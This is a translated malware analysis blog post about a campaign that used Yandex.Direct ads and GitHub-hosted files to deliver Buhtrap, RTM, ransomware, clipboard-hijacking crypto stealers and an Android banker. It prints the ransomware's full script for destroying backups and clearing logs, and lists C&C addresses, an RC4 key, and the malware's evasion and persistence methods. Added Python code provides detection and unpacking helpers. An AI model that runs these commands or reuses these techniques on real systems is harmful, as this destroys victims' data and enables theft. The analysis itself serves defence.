Buhtrap backdoor and ransomware distributed via Yandex.Direct

To target accountants in a cyberattack, you can use the work documents they search for online. This is roughly what a cybercriminal group did over the past few months, distributing the known backdoors Buhtrap and RTM, as well as ransomware and software for stealing cryptocurrency. Most of the targets are in Russia. The attack was carried out by placing malicious advertising on Yandex.Direct. Potential victims were directed to a website where they were asked to download a malicious file disguised as a document template. Yandex removed the malicious ad after our warning.

Buhtrap's source code was leaked online some time ago, so anyone can use it. We have no information about the availability of the RTM code.

In this post we describe how the attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.


Buhtrap and RTM are back in business

Distribution method and victims

The various payloads delivered to victims share a common distribution mechanism. All of the malicious files created by the attackers were placed in two different GitHub repositories.

Typically, a repository contained a single downloadable malicious file, which changed frequently. Since GitHub lets you view a repository's change history, we can see which malware was distributed during a given period. To persuade the victim to download the malicious file, the website blanki-shabloni24[.]ru, shown in the figure above, was used.

The design of the site and all of the malicious file names follow a single theme: forms, templates, contracts, samples, and so on. Given that Buhtrap and RTM have been used in attacks on accountants before, we assumed that the strategy of the new campaign was the same. The only question was how the victim arrived at the attackers' web page.

Infection

At least some of the potential victims who ended up on this site were drawn there by malicious ads. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As you can see from the link, the banner was placed on the legitimate accounting forum bb.f2[.]kz. It is important to note that banners appeared on various sites, all of which carried the same campaign identifier (blanki_rsya), and most of them related to accounting or legal services. The URL shows that the potential victim used the search query "download invoice form", which supports our hypothesis of targeted attacks. Below are the sites on which the banners appeared and the corresponding search queries.

  • download invoice form - bb.f2[.]kz
  • sample contract - Ipopen[.]ru
  • sample complaint application - 77metrov[.]ru
  • contract form - blank-dogovor-kupli-prodazhi[.]ru
  • sample court application - zen.yandex[.]ru
  • sample complaint - yurday[.]ru
  • sample contract forms - Regforum[.]ru
  • contract form - assistentus[.]ru
  • sample apartment lease agreement - napravah[.]com
  • sample legal contracts - avito[.]ru

The blanki-shabloni24[.]ru site may have been designed to pass a simple visual check. Typically, an ad pointing to a professional-looking site with a link to GitHub does not look obviously malicious. In addition, the attackers uploaded malicious files to the repository only for limited periods, probably for the duration of a campaign. Most of the time, the GitHub repository contained an empty zip archive or an empty EXE file. In this way, the attackers could distribute ads through Yandex.Direct on sites likely to be visited by accountants responding to specific search queries.

Next, let's look at the various payloads distributed in this way.

Payload analysis

Distribution timeline

The malicious campaign began at the end of October 2018 and is still active at the time of writing. Since the entire repository was publicly available on GitHub, we compiled an accurate timeline of the distribution of six malware families (see the figure below). We added a line showing when the banner link was observed, as measured by ESET telemetry, for comparison with the git history. As you can see, this correlates well with the availability of the payloads on GitHub. The gap at the end of February can be explained by the fact that we are missing part of the change history, because the repository was removed from GitHub before we could obtain it in full.

[Figure 1. Malware distribution timeline.]

Code signing certificates

The campaign used several certificates. Some of them signed more than one malware family, which further indicates that the different samples belonged to the same campaign. Although they had the private key, the operators did not sign the binaries systematically and did not use the key for all samples. In late February 2019, the attackers began creating invalid signatures using a certificate belonging to Google for which they did not have the private key.

All of the certificates involved in the campaign and the malware families they sign are listed in the table below.

[Table: certificates used in the campaign and the malware families signed with them.]

We also used these code signing certificates to look for links to other malware families. For most of the certificates, we found no samples that were not distributed through the GitHub repository. However, the TOV "MARIYA" certificate was used to sign malware belonging to the Wauchos botnet, as well as adware and miners. It is unlikely that this malware is related to this campaign. Most likely, the certificate was bought on the black market.

Win32/Filecoder.Buhtrap

The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. It is a Delphi binary, sometimes packed. It was distributed mainly in February and March 2019. It behaves as ransomware is expected to: it scans local drives and network shares and encrypts the files it finds. It does not need an internet connection to do its work, since it does not contact a server to send the encryption keys. Instead, it appends a "token" to the end of the ransom note and suggests using email or Bitmessage to contact the operators.

To encrypt as many sensitive resources as possible, Filecoder.Buhtrap runs a thread designed to shut down key software that may hold open file handles on files containing valuable information, which would otherwise interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make data recovery harder. To do this, it runs the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
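As an added illustration (not code from the original post or from ESET), the following Python script shows how a defender might flag the commands from this script in process-creation telemetry (Sysmon Event ID 1 or Security Event ID 4688 command lines). The sample events are constructed, the rule names are mine, and the regular expressions are derived from the command lines above; several distinct rules firing on one host in a short window is the pre-encryption pattern this script produces.

```python
import re

# Constructed process-creation events (command lines only). Not real telemetry.
SAMPLE_EVENTS = [
    'bcdedit /set {default} bootstatuspolicy ignoreallfailures',
    'bcdedit /set {default} recoveryenabled no',
    'wbadmin delete catalog -quiet',
    'wmic shadowcopy delete',
    'vssadmin delete shadows /all /quiet',
    r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f',
    'wevtutil.exe clear-log Security',
    'sc config eventlog start=disabled',
    r'notepad.exe C:\Users\acct\invoice.txt',   # benign
    'vssadmin list shadows',                      # benign, read-only
]

# Detection rules derived from the batch script above. Rule names are my own labels.
RULES = [
    ('boot_status_policy_ignored',
     re.compile(r'\bbcdedit\b.*\bbootstatuspolicy\s+ignoreallfailures\b', re.I)),
    ('boot_recovery_disabled',
     re.compile(r'\bbcdedit\b.*\brecoveryenabled\s+no\b', re.I)),
    ('backups_deleted',
     re.compile(r'\bwbadmin\b.*\bdelete\b', re.I)),
    ('shadow_copies_deleted',
     re.compile(r'\bvssadmin\b.*\bdelete\s+shadows\b|\bwmic\b.*\bshadowcopy\s+delete\b', re.I)),
    ('rdp_history_wiped',
     re.compile(r'\breg\b.*\bdelete\b.*terminal server client', re.I)),
    ('event_log_cleared',
     re.compile(r'\bwevtutil(\.exe)?\b.*\bclear-log\b', re.I)),
    ('event_log_service_disabled',
     re.compile(r'\bsc\b.*\bconfig\s+eventlog\b.*\bstart=\s*disabled\b', re.I)),
]


def classify(cmdline):
    """Names of all rules matched by one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def score_host(events, threshold=3):
    """Aggregate per host: one rule is worth a look, but several distinct rules
    in one window is the recovery-inhibition pattern of the script above."""
    hits = {}
    for cmd in events:
        for name in classify(cmd):
            hits.setdefault(name, []).append(cmd)
    return {'hits': hits,
            'distinct_rules': len(hits),
            'alert': len(hits) >= threshold}


if __name__ == '__main__':
    result = score_host(SAMPLE_EVENTS)
    for name, cmds in result['hits'].items():
        print(f'{name}: {cmds}')
    print('ALERT' if result['alert'] else 'no alert', '-', result['distinct_rules'], 'distinct rules')
```

The threshold is deliberately low because each of these commands has a legitimate administrative use; the signal is the combination, within minutes, on a workstation where none of them normally run.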

Filecoder.Buhtrap uses the legitimate IP Logger web service, which is designed to collect information about website visitors. Here it is used to track ransomware victims; this is handled by the following command line:

mshta.exe "javascript:document.write('');"

Files are selected for encryption unless they match one of three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the directory strings in the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are also excluded from encryption, including the file name of the ransom note. The list is shown below. Clearly, all of these exclusions are intended to keep the machine bootable, if only with minimal functionality.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File encryption scheme

When executed, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hardcoded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code responsible for this is shown in Figure 2.

[Figure 2. Hex-Rays decompilation of the 512-bit RSA key pair generation routine.]

Below is an example of the plaintext with a generated private key, which is the token appended to the ransom note.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' hardcoded public key consists of a public exponent e and a modulus n.


Files are encrypted using AES-128-CBC with a 256-bit key. A new key and a new initialization vector are generated for each encrypted file. The key information is appended to the end of the encrypted file. Let's look at the format of an encrypted file.
Encrypted files have the following header:

[Figure: encrypted file header layout.]

The data of the original file, with the magic value VEGA added, is encrypted up to the first 0x5000 bytes. All of the decryption information is appended to the file with the following structure:

[Figure: structure of the decryption information appended to each encrypted file.]

- The file size flags contain a flag indicating whether the file is larger than 0x5000 bytes.
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hardcoded RSA public key))

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from late October to early December 2018. Its role is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. When a target wallet address is found, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to hide its behavior is string encryption. The operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period in which the malware was being spread, only small amounts of BTC were sent to the attackers' Bitcoin wallets, which casts doubt on the success of the campaign. Moreover, there is no evidence that these transactions were related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for a few days in early March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, and that description is still relevant. In January 2019, Palo Alto Networks also released a blog post about RTM.

Buhtrap loader

For some time, a loader was available on GitHub that did not resemble the earlier Buhtrap tools. It contacts https://94.100.18[.]67/RSS.php?<some_id> to fetch the next stage and loads it directly into memory. We can distinguish two behaviors of the second-stage code. In the first, the RSS.php URL delivered the Buhtrap backdoor directly; this backdoor is very similar to the one available since the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor that are believed to be run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual DLL deployment scheme we discussed earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we have seen, the operators did not bother to change this key.

The second, more complex behavior was that the RSS.php URL delivered another loader. This one implemented some obfuscation, such as rebuilding the dynamic import table. The purpose of the loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we observed being executed by this loader was the same Buhtrap backdoor, but there may be other components.

Android/Spy.Banker

Interestingly, an Android component was also found in the GitHub repository. It was in the main branch for only one day, November 1, 2018. Apart from its being posted on GitHub, ESET telemetry found no evidence that this malware was distributed.

The component was hosted as an Android Application Package (APK). It is heavily obfuscated. The malicious behavior is hidden in an encrypted JAR located inside the APK. It is encrypted with RC4 using this key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which begins immediately after the length field.
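The container described here can be unpacked with a few lines of code. The following Python is an added example, not code from the post or from the malware: it implements RC4 with the key above and parses the 4-byte length field. The post does not state the byte order of the length field, so little-endian is assumed here, and the sample JAR bytes are constructed for a round-trip check rather than taken from a real sample.

```python
import struct

# RC4 key copied from the post (used for the embedded JAR and for strings).
KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])

ZIP_MAGIC = b'PK\x03\x04'   # a JAR is a zip archive; used as a sanity check after decryption


def rc4(key, data):
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xff])
    return bytes(out)


def unwrap_container(blob, key=KEY):
    """Parse the image/files container: 4-byte length, then the RC4-encrypted JAR.
    The byte order of the length field is assumed little-endian (not stated in the post)."""
    if len(blob) < 4:
        raise ValueError('container too short for a length field')
    (length,) = struct.unpack('<I', blob[:4])
    encrypted = blob[4:4 + length]
    if len(encrypted) != length:
        raise ValueError(f'truncated: header says {length} bytes, got {len(encrypted)}')
    jar = rc4(key, encrypted)
    if not jar.startswith(ZIP_MAGIC):
        raise ValueError('decrypted payload is not a zip/JAR: wrong key or byte order?')
    return jar


def wrap_container(jar, key=KEY):
    """Inverse of unwrap_container; used here only to build a test vector."""
    return struct.pack('<I', len(jar)) + rc4(key, jar)


def decrypt_string(encrypted, key=KEY):
    """Strings use the same key and algorithm; UTF-8 text is an assumption on my part."""
    return rc4(key, encrypted).decode('utf-8', errors='replace')


# Constructed stand-in for an encrypted JAR: zip magic followed by filler bytes.
SAMPLE_JAR = ZIP_MAGIC + b'\x14\x00' + b'\x00' * 24 + b'META-INF/MANIFEST.MF' + b'\x00' * 8
SAMPLE_CONTAINER = wrap_container(SAMPLE_JAR)

if __name__ == '__main__':
    recovered = unwrap_container(SAMPLE_CONTAINER)
    print(len(recovered), 'bytes recovered, zip magic present:', recovered.startswith(ZIP_MAGIC))
```

If the zip magic check fails on a real sample, the first things to vary are the byte order of the length field and whether the length covers only the ciphertext or the whole file.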

After decrypting the file, we found that it was Anubis, a previously documented Android banker. The malware has the following capabilities:

  • microphone recording
  • taking screenshots
  • obtaining GPS coordinates
  • keylogging
  • encrypting device data and demanding a ransom
  • sending spam

Interestingly, the banker uses Twitter as a fallback communication channel to obtain another C&C server. The sample we analyzed used the @JonesTrader account, but at the time of analysis it had already been suspended.

The banker contains a list of targeted applications on the Android device. It is longer than the list found in the Sophos study. The list includes many banking applications, online shopping apps such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign was a .NET Windows executable that appeared in March 2019. Most of the versions we studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component works with the clipboard. Its targets are a wide range of cryptocurrencies, as well as offers on Steam. In addition, it uses the IP Logger service to steal Bitcoin private keys in WIF format.

Protection mechanisms

In addition to the protection ConfuserEx provides against debugging, dumping and tampering, the component includes the ability to detect antivirus products and virtual machines.

To check whether it is running in a virtual machine, the malware uses the built-in Windows WMI command-line tool (WMIC) to request BIOS information, namely:

wmic bios

The program then parses the command output and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After base64 decoding, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

[Figure 3. Antivirus product detection routine.]

In addition, the malware checks whether CryptoClipWatcher, a tool that protects against clipboard attacks, is running and, if so, suspends all threads of that process, thereby disabling the protection.

Persistence

The version of the malware we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then modifies the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell value in the Windows registry, adding the path to updater.exe. As a result, the malware is executed every time the user logs in.

Malicious behavior

Like ClipBanker, the malware monitors the contents of the clipboard and looks for cryptocurrency wallet addresses; when it finds one, it replaces it with one of the operators' addresses. Below is the list of targeted address types, based on what we found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Each address type has a corresponding regular expression. The STEAM_URL value is used to attack the Steam platform, as can be seen from the regular expression used to match the clipboard buffer:

\b(https://|http://|)steamcommunity.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b
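As an added example (not the malware's code and not from the original post), the following Python applies the Steam trade-offer pattern above in a defender-side clipboard integrity check: the user copies a value, and the check reports a swap when the clipboard later holds a different value that matches a watched pattern. The Base58 Bitcoin pattern and the sample clipboard history are my own constructions, not the malware's BTC_P2PKH expression or real data.

```python
import re

# Pattern from the post (STEAM_URL), with the backslash escapes restored:
# \b at both ends and \? before the query string.
STEAM_TRADE_URL = re.compile(
    r'\b(https://|http://|)steamcommunity.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b'
)

# My own constructed example of a second watched pattern: legacy Base58 Bitcoin
# addresses (P2PKH starting with 1, P2SH starting with 3).
BTC_LEGACY = re.compile(r'\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b')

WATCHED = [('STEAM_URL', STEAM_TRADE_URL), ('BTC_LEGACY', BTC_LEGACY)]


def classify_clipboard(text):
    """Name of the first watched pattern found in the clipboard text, or None."""
    for name, rx in WATCHED:
        if rx.search(text):
            return name
    return None


def clipboard_swapped(copied, current):
    """Compare what the user put on the clipboard with what it holds at paste time.
    Returns (swapped, kind): a swap is reported when the current content matches a
    watched pattern and differs from what was copied."""
    kind = classify_clipboard(current)
    if kind is None or current == copied:
        return False, kind
    return True, kind


# Constructed clipboard history: (what the user copied, what the clipboard held at paste time).
SAMPLE_HISTORY = [
    ('https://steamcommunity.com/tradeoffer/new/?partner=12345&token=AbCd1234',
     'https://steamcommunity.com/tradeoffer/new/?partner=12345&token=AbCd1234'),
    ('https://steamcommunity.com/tradeoffer/new/?partner=12345&token=AbCd1234',
     'https://steamcommunity.com/tradeoffer/new/?partner=98765&token=ZzZz9999'),   # swapped
    ('1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2', '1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2'),
    ('meeting at 10', 'meeting at 10'),
]


def audit(history):
    """Return (index, kind) for every history entry where a swap was detected."""
    findings = []
    for i, (copied, current) in enumerate(history):
        swapped, kind = clipboard_swapped(copied, current)
        if swapped:
            findings.append((i, kind))
    return findings


if __name__ == '__main__':
    for i, kind in audit(SAMPLE_HISTORY):
        print(f'entry {i}: {kind} value changed between copy and paste')
```

The check only needs the pattern list and the last value the user copied, which is why clipboard-guard tools like the one the malware tries to suspend can work without knowing any attacker addresses.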

Exfiltration channel

In addition to replacing addresses in the clipboard, the malware targets the WIF private keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as an exfiltration channel for the WIF private key. To do this, the operators place the private key data in the HTTP User-Agent header, as shown below.

[Figure 4. IP Logger console with exfiltrated data.]

The operators did not use iplogger.org to drain the wallets. They probably resorted to a different method because of the 255-character limit on the User-Agent field shown in the IP Logger web interface. In the samples we studied, the other exfiltration server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not assigned anywhere in the code. This suggests that the malware is still under development and that the variable was set on the operators' test machine.

There is another sign that the program is under development. The binary contains two iplogger.org URLs, and both are queried when data is exfiltrated. In the request to one of these URLs, the value of the Referer field is prefixed with "DEV /". We also found a version not packed with ConfuserEx, in which the handler for this URL is named DevFeedbackUrl. Based on the name of the environment variable, we believe the operators plan to use the legitimate Discord service and its webhook system to steal cryptocurrency wallets.

Conclusion

This campaign is an example of the use of legitimate advertising services in cyberattacks. The scheme targets Russian organizations, but we would not be surprised to see a similar attack using non-Russian services. To avoid compromise, users should rely on the reputation of the source of the software they download.

A complete list of indicators of compromise and MITRE ATT&CK attributes is available at this link.

Source: www.habr.com
